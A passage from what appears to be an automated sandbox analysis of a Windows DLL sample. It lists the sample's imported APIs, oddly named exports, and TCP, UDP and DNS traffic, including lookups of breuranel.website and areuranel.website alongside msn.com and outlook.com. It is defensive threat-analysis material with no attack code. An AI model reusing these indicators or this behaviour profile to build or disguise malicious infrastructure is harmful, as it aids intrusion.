                                                                                                                                KERNEL32.dllLockResource, FreeLibrary, GetProcAddress, VirtualProtect, OpenProcess, GetCurrentThreadId, Sleep, GetSystemTime, CreateSemaphoreW, LoadLibraryW, GetModuleFileNameW, GetModuleHandleW, GetTempPathW, CreateFileW, GetVolumeInformationW, QueryPerformanceCounter, GetVersionExW, GetDateFormatW, OutputDebugStringW, CloseHandle, ReadConsoleW, ReadFile, GetConsoleMode, GetConsoleCP, WriteFile, FlushFileBuffers, HeapSize, SetStdHandle, SetFilePointerEx, GetFileSizeEx, GetProcessHeap, SetEnvironmentVariableW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetCommandLineA, GetOEMCP, GetACP, IsValidCodePage, FindNextFileW, FindFirstFileExW, FindClose, SetConsoleCtrlHandler, GetFileType, GetStdHandle, HeapReAlloc, HeapFree, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, EncodePointer, DecodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, WideCharToMultiByte, SetLastError, InitializeCriticalSectionAndSpinCount, CreateEventW, SwitchToThread, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetSystemTimeAsFileTime, GetTickCount, MultiByteToWideChar, GetStringTypeW, CompareStringW, LCMapStringW, GetLocaleInfoW, GetCPInfo, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, GetCurrentProcess, TerminateProcess, GetCurrentProcessId, InitializeSListHead, RaiseException, RtlUnwind, InterlockedPushEntrySList, InterlockedFlushSList, GetLastError, LoadLibraryExW, QueryPerformanceFrequency, ExitProcess, GetModuleHandleExW, GetCurrentThread, HeapAlloc, GetTimeZoneInformation, GetTimeFormatW, WriteConsoleW
                                                                                                                                USER32.dllCreateMenu, DeferWindowPos, BeginDeferWindowPos, UnregisterHotKey, TranslateMessage, RegisterWindowMessageW, GetPropW
                                                                                                                                MSACM32.dllacmDriverClose, acmFormatChooseW, acmFilterDetailsW, acmFilterEnumW, acmDriverEnum, acmDriverPriority, acmFormatEnumW, acmFilterTagEnumW, acmFormatTagDetailsW, acmDriverMessage, acmFormatSuggest, acmFilterTagDetailsW, acmFormatTagEnumW, acmFilterChooseW, acmDriverOpen, acmDriverDetailsW, acmFormatDetailsW, acmMetrics, acmDriverAddW, acmDriverRemove, acmDriverID, acmGetVersion

                                                                                                                                Exports

                                                                                                                                NameOrdinalAddress
                                                                                                                                BeGrass10x10016020
                                                                                                                                Fieldeight20x100162f0
                                                                                                                                Often30x10016510
                                                                                                                                Townenter40x100167a0

                                                                                                                                Network Behavior

                                                                                                                                Network Port Distribution

                                                                                                                                TCP Packets

                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                Oct 12, 2021 00:50:46.383085012 CEST49759443192.168.2.313.82.28.61
                                                                                                                                Oct 12, 2021 00:50:46.383264065 CEST4434975913.82.28.61192.168.2.3
                                                                                                                                Oct 12, 2021 00:50:46.383400917 CEST49759443192.168.2.313.82.28.61
                                                                                                                                Oct 12, 2021 00:50:46.389113903 CEST49759443192.168.2.313.82.28.61
                                                                                                                                Oct 12, 2021 00:50:46.389153004 CEST4434975913.82.28.61192.168.2.3
                                                                                                                                Oct 12, 2021 00:50:46.703313112 CEST4434975913.82.28.61192.168.2.3
                                                                                                                                Oct 12, 2021 00:50:46.703394890 CEST49759443192.168.2.313.82.28.61
                                                                                                                                Oct 12, 2021 00:50:46.706571102 CEST49759443192.168.2.313.82.28.61
                                                                                                                                Oct 12, 2021 00:50:46.706589937 CEST4434975913.82.28.61192.168.2.3
                                                                                                                                Oct 12, 2021 00:50:46.706839085 CEST4434975913.82.28.61192.168.2.3
                                                                                                                                Oct 12, 2021 00:50:46.929090977 CEST4434975913.82.28.61192.168.2.3
                                                                                                                                Oct 12, 2021 00:50:46.932966948 CEST49759443192.168.2.313.82.28.61
                                                                                                                                Oct 12, 2021 00:50:46.933007002 CEST49759443192.168.2.313.82.28.61
                                                                                                                                Oct 12, 2021 00:50:46.978180885 CEST49759443192.168.2.313.82.28.61
                                                                                                                                Oct 12, 2021 00:50:47.019146919 CEST4434975913.82.28.61192.168.2.3
                                                                                                                                Oct 12, 2021 00:50:47.091273069 CEST4434975913.82.28.61192.168.2.3
                                                                                                                                Oct 12, 2021 00:50:47.091360092 CEST4434975913.82.28.61192.168.2.3
                                                                                                                                Oct 12, 2021 00:50:47.103151083 CEST4434975913.82.28.61192.168.2.3
                                                                                                                                Oct 12, 2021 00:50:47.108998060 CEST49759443192.168.2.313.82.28.61
                                                                                                                                Oct 12, 2021 00:50:47.109036922 CEST49759443192.168.2.313.82.28.61
                                                                                                                                Oct 12, 2021 00:50:47.109047890 CEST49759443192.168.2.313.82.28.61
                                                                                                                                Oct 12, 2021 00:50:47.109065056 CEST4434975913.82.28.61192.168.2.3
                                                                                                                                Oct 12, 2021 00:50:47.109095097 CEST49759443192.168.2.313.82.28.61
                                                                                                                                Oct 12, 2021 00:50:47.109102011 CEST4434975913.82.28.61192.168.2.3
                                                                                                                                Oct 12, 2021 00:50:59.905160904 CEST49766443192.168.2.313.82.28.61
                                                                                                                                Oct 12, 2021 00:50:59.905235052 CEST4434976613.82.28.61192.168.2.3
                                                                                                                                Oct 12, 2021 00:50:59.905407906 CEST49766443192.168.2.313.82.28.61
                                                                                                                                Oct 12, 2021 00:50:59.916407108 CEST49766443192.168.2.313.82.28.61
                                                                                                                                Oct 12, 2021 00:50:59.916452885 CEST4434976613.82.28.61192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:00.122654915 CEST4434976613.82.28.61192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:00.122772932 CEST49766443192.168.2.313.82.28.61
                                                                                                                                Oct 12, 2021 00:51:00.126184940 CEST49766443192.168.2.313.82.28.61
                                                                                                                                Oct 12, 2021 00:51:00.126225948 CEST4434976613.82.28.61192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:00.126672029 CEST4434976613.82.28.61192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:00.331165075 CEST4434976613.82.28.61192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:00.331262112 CEST49766443192.168.2.313.82.28.61
                                                                                                                                Oct 12, 2021 00:51:00.620603085 CEST49766443192.168.2.313.82.28.61
                                                                                                                                Oct 12, 2021 00:51:00.663161039 CEST4434976613.82.28.61192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:00.739191055 CEST4434976613.82.28.61192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:00.739284992 CEST4434976613.82.28.61192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:00.739386082 CEST49766443192.168.2.313.82.28.61
                                                                                                                                Oct 12, 2021 00:51:00.741317987 CEST49766443192.168.2.313.82.28.61
                                                                                                                                Oct 12, 2021 00:51:00.741343021 CEST4434976613.82.28.61192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:27.829962969 CEST49779443192.168.2.340.97.161.50
                                                                                                                                Oct 12, 2021 00:51:27.830005884 CEST4434977940.97.161.50192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:27.831302881 CEST49779443192.168.2.340.97.161.50
                                                                                                                                Oct 12, 2021 00:51:27.831747055 CEST49779443192.168.2.340.97.161.50
                                                                                                                                Oct 12, 2021 00:51:27.831760883 CEST4434977940.97.161.50192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:28.345242977 CEST4434977940.97.161.50192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:28.345370054 CEST49779443192.168.2.340.97.161.50
                                                                                                                                Oct 12, 2021 00:51:28.350394011 CEST49779443192.168.2.340.97.161.50
                                                                                                                                Oct 12, 2021 00:51:28.350404978 CEST4434977940.97.161.50192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:28.350694895 CEST4434977940.97.161.50192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:28.353148937 CEST49779443192.168.2.340.97.161.50
                                                                                                                                Oct 12, 2021 00:51:28.395128012 CEST4434977940.97.161.50192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:28.521780968 CEST4434977940.97.161.50192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:28.521857977 CEST4434977940.97.161.50192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:28.521950960 CEST49779443192.168.2.340.97.161.50
                                                                                                                                Oct 12, 2021 00:51:28.522217035 CEST49779443192.168.2.340.97.161.50
                                                                                                                                Oct 12, 2021 00:51:28.522236109 CEST4434977940.97.161.50192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:28.522434950 CEST49779443192.168.2.340.97.161.50
                                                                                                                                Oct 12, 2021 00:51:28.522449970 CEST4434977940.97.161.50192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:28.552305937 CEST49782443192.168.2.352.98.207.210
                                                                                                                                Oct 12, 2021 00:51:28.552341938 CEST4434978252.98.207.210192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:28.553409100 CEST49782443192.168.2.352.98.207.210
                                                                                                                                Oct 12, 2021 00:51:28.554908991 CEST49782443192.168.2.352.98.207.210
                                                                                                                                Oct 12, 2021 00:51:28.554927111 CEST4434978252.98.207.210192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:28.659035921 CEST4434978252.98.207.210192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:28.659148932 CEST49782443192.168.2.352.98.207.210
                                                                                                                                Oct 12, 2021 00:51:28.663799047 CEST49782443192.168.2.352.98.207.210
                                                                                                                                Oct 12, 2021 00:51:28.663817883 CEST4434978252.98.207.210192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:28.664269924 CEST4434978252.98.207.210192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:28.668565989 CEST49782443192.168.2.352.98.207.210
                                                                                                                                Oct 12, 2021 00:51:28.698314905 CEST4434978252.98.207.210192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:28.698421001 CEST4434978252.98.207.210192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:28.698537111 CEST49782443192.168.2.352.98.207.210
                                                                                                                                Oct 12, 2021 00:51:28.698973894 CEST49782443192.168.2.352.98.207.210
                                                                                                                                Oct 12, 2021 00:51:28.698997974 CEST4434978252.98.207.210192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:28.726995945 CEST49783443192.168.2.340.101.60.226
                                                                                                                                Oct 12, 2021 00:51:28.727035046 CEST4434978340.101.60.226192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:28.727166891 CEST49783443192.168.2.340.101.60.226
                                                                                                                                Oct 12, 2021 00:51:28.728127003 CEST49783443192.168.2.340.101.60.226
                                                                                                                                Oct 12, 2021 00:51:28.728147984 CEST4434978340.101.60.226192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:28.835772038 CEST4434978340.101.60.226192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:28.836008072 CEST49783443192.168.2.340.101.60.226
                                                                                                                                Oct 12, 2021 00:51:28.839567900 CEST49783443192.168.2.340.101.60.226
                                                                                                                                Oct 12, 2021 00:51:28.839591026 CEST4434978340.101.60.226192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:28.839824915 CEST4434978340.101.60.226192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:28.842505932 CEST49783443192.168.2.340.101.60.226
                                                                                                                                Oct 12, 2021 00:51:28.883135080 CEST4434978340.101.60.226192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:28.896899939 CEST4434978340.101.60.226192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:28.897229910 CEST4434978340.101.60.226192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:28.897412062 CEST49783443192.168.2.340.101.60.226
                                                                                                                                Oct 12, 2021 00:51:28.897692919 CEST49783443192.168.2.340.101.60.226
                                                                                                                                Oct 12, 2021 00:51:28.897708893 CEST4434978340.101.60.226192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:28.897897959 CEST49783443192.168.2.340.101.60.226
                                                                                                                                Oct 12, 2021 00:51:28.897907972 CEST4434978340.101.60.226192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:42.616982937 CEST49816443192.168.2.340.97.161.50
                                                                                                                                Oct 12, 2021 00:51:42.617027998 CEST4434981640.97.161.50192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:42.617142916 CEST49816443192.168.2.340.97.161.50
                                                                                                                                Oct 12, 2021 00:51:42.618019104 CEST49816443192.168.2.340.97.161.50
                                                                                                                                Oct 12, 2021 00:51:42.618037939 CEST4434981640.97.161.50192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:43.121491909 CEST4434981640.97.161.50192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:43.121779919 CEST49816443192.168.2.340.97.161.50
                                                                                                                                Oct 12, 2021 00:51:43.124639988 CEST49816443192.168.2.340.97.161.50
                                                                                                                                Oct 12, 2021 00:51:43.124667883 CEST4434981640.97.161.50192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:43.125070095 CEST4434981640.97.161.50192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:43.128093004 CEST49816443192.168.2.340.97.161.50
                                                                                                                                Oct 12, 2021 00:51:43.171152115 CEST4434981640.97.161.50192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:43.300297022 CEST4434981640.97.161.50192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:43.300379992 CEST4434981640.97.161.50192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:43.300591946 CEST49816443192.168.2.340.97.161.50
                                                                                                                                Oct 12, 2021 00:51:43.300734043 CEST49816443192.168.2.340.97.161.50
                                                                                                                                Oct 12, 2021 00:51:43.300770998 CEST4434981640.97.161.50192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:43.300832033 CEST49816443192.168.2.340.97.161.50
                                                                                                                                Oct 12, 2021 00:51:43.300857067 CEST4434981640.97.161.50192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:43.329210997 CEST49820443192.168.2.352.98.207.210
                                                                                                                                Oct 12, 2021 00:51:43.329260111 CEST4434982052.98.207.210192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:43.329387903 CEST49820443192.168.2.352.98.207.210
                                                                                                                                Oct 12, 2021 00:51:43.330302000 CEST49820443192.168.2.352.98.207.210
                                                                                                                                Oct 12, 2021 00:51:43.330327034 CEST4434982052.98.207.210192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:43.419485092 CEST4434982052.98.207.210192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:43.420157909 CEST49820443192.168.2.352.98.207.210
                                                                                                                                Oct 12, 2021 00:51:43.422338963 CEST49820443192.168.2.352.98.207.210
                                                                                                                                Oct 12, 2021 00:51:43.422359943 CEST4434982052.98.207.210192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:43.422724962 CEST4434982052.98.207.210192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:43.425338984 CEST49820443192.168.2.352.98.207.210
                                                                                                                                Oct 12, 2021 00:51:43.455162048 CEST4434982052.98.207.210192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:43.455255985 CEST4434982052.98.207.210192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:43.455404043 CEST49820443192.168.2.352.98.207.210
                                                                                                                                Oct 12, 2021 00:51:43.464049101 CEST49820443192.168.2.352.98.207.210
                                                                                                                                Oct 12, 2021 00:51:43.464081049 CEST4434982052.98.207.210192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:43.464117050 CEST49820443192.168.2.352.98.207.210
                                                                                                                                Oct 12, 2021 00:51:43.464127064 CEST4434982052.98.207.210192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:43.490286112 CEST49821443192.168.2.340.101.60.226
                                                                                                                                Oct 12, 2021 00:51:43.490325928 CEST4434982140.101.60.226192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:43.491162062 CEST49821443192.168.2.340.101.60.226
                                                                                                                                Oct 12, 2021 00:51:43.494148016 CEST49821443192.168.2.340.101.60.226
                                                                                                                                Oct 12, 2021 00:51:43.494200945 CEST4434982140.101.60.226192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:43.583831072 CEST4434982140.101.60.226192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:43.584162951 CEST49821443192.168.2.340.101.60.226
                                                                                                                                Oct 12, 2021 00:51:43.586349964 CEST49821443192.168.2.340.101.60.226
                                                                                                                                Oct 12, 2021 00:51:43.586366892 CEST4434982140.101.60.226192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:43.586759090 CEST4434982140.101.60.226192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:43.590284109 CEST49821443192.168.2.340.101.60.226
                                                                                                                                Oct 12, 2021 00:51:43.631139994 CEST4434982140.101.60.226192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:43.638864994 CEST4434982140.101.60.226192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:43.639061928 CEST4434982140.101.60.226192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:43.640309095 CEST49821443192.168.2.340.101.60.226
                                                                                                                                Oct 12, 2021 00:51:43.640464067 CEST49821443192.168.2.340.101.60.226
                                                                                                                                Oct 12, 2021 00:51:43.640480995 CEST4434982140.101.60.226192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:43.640497923 CEST49821443192.168.2.340.101.60.226
                                                                                                                                Oct 12, 2021 00:51:43.640503883 CEST4434982140.101.60.226192.168.2.3

                                                                                                                                UDP Packets

                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                Oct 12, 2021 00:50:46.328675985 CEST4957253192.168.2.38.8.8.8
                                                                                                                                Oct 12, 2021 00:50:46.346757889 CEST53495728.8.8.8192.168.2.3
                                                                                                                                Oct 12, 2021 00:50:47.112384081 CEST6082353192.168.2.38.8.8.8
                                                                                                                                Oct 12, 2021 00:50:59.810003996 CEST4955953192.168.2.38.8.8.8
                                                                                                                                Oct 12, 2021 00:50:59.828058004 CEST53495598.8.8.8192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:00.767441988 CEST5265053192.168.2.38.8.8.8
                                                                                                                                Oct 12, 2021 00:51:07.697834969 CEST5361553192.168.2.38.8.8.8
                                                                                                                                Oct 12, 2021 00:51:07.716279984 CEST53536158.8.8.8192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:22.258112907 CEST5710653192.168.2.38.8.8.8
                                                                                                                                Oct 12, 2021 00:51:22.279072046 CEST53571068.8.8.8192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:27.808382034 CEST6098253192.168.2.38.8.8.8
                                                                                                                                Oct 12, 2021 00:51:27.828670979 CEST53609828.8.8.8192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:28.527216911 CEST6436753192.168.2.38.8.8.8
                                                                                                                                Oct 12, 2021 00:51:28.549596071 CEST53643678.8.8.8192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:28.705688000 CEST5153953192.168.2.38.8.8.8
                                                                                                                                Oct 12, 2021 00:51:28.724781990 CEST53515398.8.8.8192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:42.597249031 CEST6349053192.168.2.38.8.8.8
                                                                                                                                Oct 12, 2021 00:51:42.614928007 CEST53634908.8.8.8192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:43.307075024 CEST6511053192.168.2.38.8.8.8
                                                                                                                                Oct 12, 2021 00:51:43.325108051 CEST53651108.8.8.8192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:43.469110966 CEST6112053192.168.2.38.8.8.8
                                                                                                                                Oct 12, 2021 00:51:43.486862898 CEST53611208.8.8.8192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:49.150876999 CEST5307953192.168.2.38.8.8.8
                                                                                                                                Oct 12, 2021 00:51:49.169133902 CEST53530798.8.8.8192.168.2.3
                                                                                                                                Oct 12, 2021 00:52:04.028712988 CEST5356953192.168.2.38.8.8.8
                                                                                                                                Oct 12, 2021 00:52:04.047215939 CEST53535698.8.8.8192.168.2.3
                                                                                                                                Oct 12, 2021 00:52:09.192166090 CEST6285553192.168.2.38.8.8.8
                                                                                                                                Oct 12, 2021 00:52:09.213083982 CEST53628558.8.8.8192.168.2.3

                                                                                                                                DNS Queries

                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                Oct 12, 2021 00:50:46.328675985 CEST192.168.2.38.8.8.80xe703Standard query (0)msn.comA (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:50:47.112384081 CEST192.168.2.38.8.8.80xc12dStandard query (0)www.msn.comA (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:50:59.810003996 CEST192.168.2.38.8.8.80xabaStandard query (0)msn.comA (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:00.767441988 CEST192.168.2.38.8.8.80x1d9cStandard query (0)www.msn.comA (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:07.697834969 CEST192.168.2.38.8.8.80xf9f2Standard query (0)breuranel.websiteA (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:22.258112907 CEST192.168.2.38.8.8.80x27cbStandard query (0)breuranel.websiteA (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:27.808382034 CEST192.168.2.38.8.8.80x171fStandard query (0)outlook.comA (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:28.527216911 CEST192.168.2.38.8.8.80x2f20Standard query (0)www.outlook.comA (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:28.705688000 CEST192.168.2.38.8.8.80x6abeStandard query (0)outlook.office365.comA (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:42.597249031 CEST192.168.2.38.8.8.80xe44aStandard query (0)outlook.comA (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:43.307075024 CEST192.168.2.38.8.8.80xcd71Standard query (0)www.outlook.comA (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:43.469110966 CEST192.168.2.38.8.8.80x8ed1Standard query (0)outlook.office365.comA (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:49.150876999 CEST192.168.2.38.8.8.80xc5f5Standard query (0)areuranel.websiteA (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:52:04.028712988 CEST192.168.2.38.8.8.80x6b6fStandard query (0)areuranel.websiteA (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:52:09.192166090 CEST192.168.2.38.8.8.80x2e04Standard query (0)msn.comA (IP address)IN (0x0001)

                                                                                                                                DNS Answers

                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                Oct 12, 2021 00:50:46.346757889 CEST8.8.8.8192.168.2.30xe703No error (0)msn.com13.82.28.61A (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:50:47.130182028 CEST8.8.8.8192.168.2.30xc12dNo error (0)www.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:50:56.123812914 CEST8.8.8.8192.168.2.30x703eNo error (0)prda.aadg.msidentity.comwww.tm.a.prd.aadg.trafficmanager.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:50:59.828058004 CEST8.8.8.8192.168.2.30xabaNo error (0)msn.com13.82.28.61A (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:00.784550905 CEST8.8.8.8192.168.2.30x1d9cNo error (0)www.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:07.716279984 CEST8.8.8.8192.168.2.30xf9f2Name error (3)breuranel.websitenonenoneA (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:22.279072046 CEST8.8.8.8192.168.2.30x27cbName error (3)breuranel.websitenonenoneA (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:27.828670979 CEST8.8.8.8192.168.2.30x171fNo error (0)outlook.com40.97.161.50A (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:27.828670979 CEST8.8.8.8192.168.2.30x171fNo error (0)outlook.com40.97.156.114A (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:27.828670979 CEST8.8.8.8192.168.2.30x171fNo error (0)outlook.com40.97.160.2A (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:27.828670979 CEST8.8.8.8192.168.2.30x171fNo error (0)outlook.com40.97.128.194A (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:27.828670979 CEST8.8.8.8192.168.2.30x171fNo error (0)outlook.com40.97.164.146A (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:27.828670979 CEST8.8.8.8192.168.2.30x171fNo error (0)outlook.com40.97.153.146A (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:27.828670979 CEST8.8.8.8192.168.2.30x171fNo error (0)outlook.com40.97.116.82A (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:27.828670979 CEST8.8.8.8192.168.2.30x171fNo error (0)outlook.com40.97.148.226A (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:28.549596071 CEST8.8.8.8192.168.2.30x2f20No error (0)www.outlook.comoutlook.office365.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:28.549596071 CEST8.8.8.8192.168.2.30x2f20No error (0)outlook.office365.comoutlook.ha.office365.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:28.549596071 CEST8.8.8.8192.168.2.30x2f20No error (0)outlook.ha.office365.comoutlook.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:28.549596071 CEST8.8.8.8192.168.2.30x2f20No error (0)outlook.ms-acdc.office.comHHN-efz.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:28.549596071 CEST8.8.8.8192.168.2.30x2f20No error (0)HHN-efz.ms-acdc.office.com52.98.207.210A (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:28.549596071 CEST8.8.8.8192.168.2.30x2f20No error (0)HHN-efz.ms-acdc.office.com52.97.220.18A (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:28.549596071 CEST8.8.8.8192.168.2.30x2f20No error (0)HHN-efz.ms-acdc.office.com52.97.147.178A (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:28.549596071 CEST8.8.8.8192.168.2.30x2f20No error (0)HHN-efz.ms-acdc.office.com52.97.212.194A (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:28.724781990 CEST8.8.8.8192.168.2.30x6abeNo error (0)outlook.office365.comoutlook.ha.office365.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:28.724781990 CEST8.8.8.8192.168.2.30x6abeNo error (0)outlook.ha.office365.comoutlook.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:28.724781990 CEST8.8.8.8192.168.2.30x6abeNo error (0)outlook.ms-acdc.office.comHHN-efz.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:28.724781990 CEST8.8.8.8192.168.2.30x6abeNo error (0)HHN-efz.ms-acdc.office.com40.101.60.226A (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:28.724781990 CEST8.8.8.8192.168.2.30x6abeNo error (0)HHN-efz.ms-acdc.office.com52.97.151.50A (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:28.724781990 CEST8.8.8.8192.168.2.30x6abeNo error (0)HHN-efz.ms-acdc.office.com52.97.149.242A (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:28.724781990 CEST8.8.8.8192.168.2.30x6abeNo error (0)HHN-efz.ms-acdc.office.com52.97.151.2A (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:42.614928007 CEST8.8.8.8192.168.2.30xe44aNo error (0)outlook.com40.97.161.50A (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:42.614928007 CEST8.8.8.8192.168.2.30xe44aNo error (0)outlook.com40.97.156.114A (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:42.614928007 CEST8.8.8.8192.168.2.30xe44aNo error (0)outlook.com40.97.160.2A (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:42.614928007 CEST8.8.8.8192.168.2.30xe44aNo error (0)outlook.com40.97.128.194A (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:42.614928007 CEST8.8.8.8192.168.2.30xe44aNo error (0)outlook.com40.97.164.146A (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:42.614928007 CEST8.8.8.8192.168.2.30xe44aNo error (0)outlook.com40.97.153.146A (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:42.614928007 CEST8.8.8.8192.168.2.30xe44aNo error (0)outlook.com40.97.116.82A (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:42.614928007 CEST8.8.8.8192.168.2.30xe44aNo error (0)outlook.com40.97.148.226A (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:43.325108051 CEST8.8.8.8192.168.2.30xcd71No error (0)www.outlook.comoutlook.office365.comCNAME (Canonical name)IN (0x0001)
